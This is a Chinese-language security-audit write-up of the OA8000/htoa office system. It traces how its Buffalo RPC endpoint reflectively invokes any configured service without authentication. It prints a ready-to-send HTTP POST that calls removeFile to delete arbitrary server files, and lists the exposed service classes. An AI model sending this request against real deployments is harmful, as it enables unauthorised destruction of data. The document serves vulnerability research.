一.基础信息

源码可以自行找一下安装包,这个系统使用的是tomcta6的版本,调试的话改一下启动文件
C:\Program Files (x86)\htoa\Tomcat\bin\InstallTomcat-NT.bat
代码一替换就可以了。
rem Set Dirs & Mem
"%EXECUTABLE%" //US//%SERVICE_NAME% --Startup auto  --JvmOptions "-Xms%MEM_MIN%m;-Xmx%MEM_MAX%m;-XX:PermSize=%MEM_PEM_MIN%;-XX:MaxPermSize=%MEM_PEM_MAX%;-Dcatalina.base=%CATALINA_BASE%;-Dcatalina.home=%CATALINA_HOME%;-Djava.endorsed.dirs=%CATALINA_HOME%\common\endorsed;-Duser.timezone=GMT+08;-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005" --StartMode jvm --StopMode jvm

二.路由和鉴权分析

开始我们的流水账哈哈,首先看看web.xml代码一,可以看到只有一个Filter但是并不是做的鉴权而是对一些请求做了xss的防御,
在审计的时候这个包在tomcat的lib下面导入到ide里面不然你根本找不到调不进去,在下面就是webobjects这个是什么呢?下面是ai的说法。
它的全称是 Apple WebObjects(有时也写作 WebObjects 或 WO),是 Apple 公司开发的一个 Java(早期有 Objective-C 版本)
企业级 Web 应用框架,最初于 1996 年发布。你看到的 web.xml 中引用的 WOServletAdaptor、JavaWebObjects 等库都属于该框架。
在下来就是buffalo,它的名称是 Buffalo RPC(简称 Buffalo),是一个轻量级的 Ajax/远程调用框架。
    <filter>
        <filter-name>OA8000Filter</filter-name>
	<filter-class>com.oa8000.filter.CrossScriptingFilter</filter-class>
    </filter>
    <filter-mapping>
	<filter-name>OA8000Filter</filter-name>
	<url-pattern>/WebObjects/*</url-pattern>
    </filter-mapping>


  <servlet>
    <servlet-name>WOServletAdaptor</servlet-name>
    <servlet-class>com.webobjects.jspservlet.WOServletAdaptor</servlet-class>
    <load-on-startup>5</load-on-startup>
  </servlet>
 
  <servlet-mapping>
    <servlet-name>WOServletAdaptor</servlet-name>
    <url-pattern>/WebObjects/*</url-pattern>
  </servlet-mapping>
  
    <servlet>
        <servlet-name>bfapp</servlet-name>
        <servlet-class>net.buffalo.web.servlet.ApplicationServlet</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>bfapp</servlet-name>
        <url-pattern>/bfapp/*</url-pattern>
    </servlet-mapping>  
简单了解了之后我们看看bfapp这会路由,Buffalo的代码是写的非常清晰的图一,首先是获取到额外的路径是否是/buffalo/
开头的之后进入这个BuffaloWorker类的validate方法会判断是不是POST请求接着走到最后一个方法processRequest图二,
35行会获取我们的额外路径路径代码一,走到36行获取buffalo-service.properties的内容其中在web.xml中没有看到配置路
径那就是固定的buffalo-service.properties,37行就是匹配额外的路径是否在配置文件中,之后进入42行
invoke方法顾名思义其实就是做了一个反射操作,到这里其实就很清楚了,我们可以执行配置文件中的任意类和方法。

    protected String getWorkerRelativePath() {
        //获取额外路径
        String pathInfo = RequestContext.getContext().getHttpRequest().getPathInfo();
        //通过/分割比如 /buffalo/oaPubptUploadService
        //terms[0]空
        //terms[1]buffalo
        //terms[2]oaPubptUploadService
        String[] terms = pathInfo.split("/");
        //获取/buffalo/
        String prefix = "/" + terms[1] + "/";
        //从/buffalo/oaPubptUploadService路径中获取/buffalo/之后的内容那就是oaPubptUploadService
        String relative = pathInfo.substring(prefix.length());
        return relative;
    }

三.漏洞

其中漏洞就非常多了个中类型的,代码一,看一下oaPubptUploadService对应的类是
com.oa8000.component.OaPubptUploadService跟进去看看图一任意文件删除,
数据包:
POST /OAapp/bfapp/buffalo/oaPubptUploadService HTTP/1.1
Host: 192.168.1.146:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0
Content-Length: 106

<buffalo-call><method>removeFile</method><string>C:\Program Files (x86)\htoa\1.txt</string></buffalo-call>

漏洞很多这里我就不看了。
#
# Buffalo Service Config
#
# Author: Michael Chen
#         Mail: mechiland AT gmail dot com
#         Blog: http://michael.nona.name (Simplified Chinese)
# Buffalo Forum: http://groups.google.com/group/amowa (zh_CN)
#
         
# serviceName=serviceClass

# simpleService, The simple Service
simpleService=net.buffalo.demo.simple.SimpleService

# The number guess service
numberService=net.buffalo.demo.numberguess.NumberGuessService

desktopService = com.oa8000.mainapp.DesktopService

tutorialService=tutorial.Service1

ajaxService=net.buffalo.demo.ajax.J2EEAjaxService

pageService=net.buffalo.demo.page.PageService

planService = com.oa8000.server.htplan.HtPlanServer
fileService = com.oa8000.server.htfile.HtFileServer
workFlowService=com.oa8000.httrace.httrace01.manager.HtTrace01SqlProcess

topMenuService = com.oa8000.mainapp.TopMenuService
applicationFormService = com.oa8000.proj.root.ApplicationFormService
forumArticleDetailService = com.oa8000.proj.root.ForumArticleDetailService
hrApplicationFormService = com.oa8000.server.hthr.HtHrServer
hrWorkApplicationFormService = com.oa8000.server.hthrwork.HtHrWorkServer
oaPubptUploadService = com.oa8000.component.OaPubptUploadService


htManager00Service = com.oa8000.htmanager.htmanager00.HtManager00Service
renameService=com.oa8000.htfile.htfile01.manager.HtFile01Manager

oaPubptUploadService = com.oa8000.component.OaPubptUploadService
carService = com.oa8000.server.htcar.HtCarServer
smsService = com.oa8000.server.htmsg.HtMsgSmsServer
meetingService = com.oa8000.server.htmeeting.HtMeetingServer
booksService = com.oa8000.server.htbooks.HtBooksServer
portalService = com.oa8000.server.htportal.HtPortalAjaxServer

photoService = com.oa8000.htphoto.htphoto00.HtPhoto00Service

taskService=com.oa8000.httask.httask01.manager.HtTask01Manager

htAssets0123Service = com.oa8000.htassets.htassets00.HtAssets00Service

salaryService = com.oa8000.server.htsalary.HtSalaryServer

portalArticleService = com.oa8000.htportal.htportal02.service.HtPortal02Service

#ÃÅ»§ÔÚÏßµ÷²éʹÓÃ
voteService = com.oa8000.server.htportal.HtVoteServer
#ÃÅ»§ÉóÅúʹÓÃ
traceForeignService=com.oa8000.server.httrace.HtTraceForeignServer
#ÃÅ»§ÏµÍ³Ê¹ÓÃÆµÈͳ¼ÆÊ¹ÓÃ
frequencyService = com.oa8000.server.htmanager.HtManagerServer
#ÃÅ»§ÂÛ̳ͳ¼ÆÊ¹ÓÃ
forumService=com.oa8000.server.htforum.HtForumServer
htExamService = com.oa8000.server.htexam.HtExamServer

#ÕÐÆ¸¹ÜÀíͳ¼ÆÊ¹ÓÃ
recruitmentService = com.oa8000.htrecruitment.htrecruitment.manager
#Ô¤ËãʹÓÃ
bugetService = com.oa8000.htbuget.htbuget01.manager.HtBuget01Manager
#Åàѵ¼Æ»®
htTrain0116Service = com.oa8000.httrain.httrain00.HtTrain00Service
#Ô¤Ëã½Ó¿Ú
bugetServer = com.oa8000.server.htbuget.HtBugetServer